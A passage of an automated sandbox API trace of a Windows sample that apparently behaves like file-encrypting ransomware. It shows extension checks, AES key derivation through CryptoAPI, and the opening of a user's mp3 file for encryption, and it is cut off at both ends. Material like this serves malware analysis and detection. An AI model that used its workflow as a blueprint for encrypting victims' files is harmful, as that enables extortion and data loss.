hHeap=0x770000) returned 1 [0037.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0037.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0037.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0037.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0037.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.642] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0037.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0037.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce38 [0037.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88ce38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0037.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0037.642] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0037.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0037.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0037.642] CloseHandle (hObject=0x140) returned 1 [0037.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0037.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0037.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0037.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0037.643] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0037.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0037.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0037.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0037.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0037.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0037.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0037.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0037.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0037.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0037.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0037.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.643] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0037.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0037.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0037.643] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.643] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.643] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.644] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.644] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0037.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.644] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.644] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.644] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.644] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1e2e450, ftCreationTime.dwHighDateTime=0x1d5bebf, ftLastAccessTime.dwLowDateTime=0xb331b1b0, ftLastAccessTime.dwHighDateTime=0x1d5b923, ftLastWriteTime.dwLowDateTime=0xb331b1b0, ftLastWriteTime.dwHighDateTime=0x1d5b923, nFileSizeHigh=0x0, nFileSizeLow=0x1836a, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Q_z7.mp3", cAlternateFileName="")) returned 0x7c20c0 [0037.644] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.644] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.644] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1e2e450, ftCreationTime.dwHighDateTime=0x1d5bebf, ftLastAccessTime.dwLowDateTime=0xb331b1b0, ftLastAccessTime.dwHighDateTime=0x1d5b923, ftLastWriteTime.dwLowDateTime=0xb331b1b0, ftLastWriteTime.dwHighDateTime=0x1d5b923, nFileSizeHigh=0x0, nFileSizeLow=0x1836a, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Q_z7.mp3", cAlternateFileName="")) returned 0x7c20c0 [0037.644] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.644] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.644] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="68KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.645] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ILlni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Llni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q_z7.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.646] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.646] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0037.646] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0037.646] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.646] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.646] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.646] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.646] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.646] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1e2e450, ftCreationTime.dwHighDateTime=0x1d5bebf, ftLastAccessTime.dwLowDateTime=0xb331b1b0, ftLastAccessTime.dwHighDateTime=0x1d5b923, ftLastWriteTime.dwLowDateTime=0xb331b1b0, ftLastWriteTime.dwHighDateTime=0x1d5b923, nFileSizeHigh=0x0, nFileSizeLow=0x1836a, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="Q_z7.mp3", cAlternateFileName="")) returned 0x7c2100 [0037.646] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0037.647] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.647] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.647] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0037.647] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0037.647] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.647] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.647] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0037.648] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0037.648] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.648] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0037.648] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.648] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.648] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.648] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.648] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.648] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.648] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0037.648] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0037.649] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.649] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.649] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0037.649] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.649] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.649] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.649] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0037.649] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.649] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.649] CryptDestroyHash (hHash=0x7c2240) returned 1 [0037.649] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7d68killni\\q_z7.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.649] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.649] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0037.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0037.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0037.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0037.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0037.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0037.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: 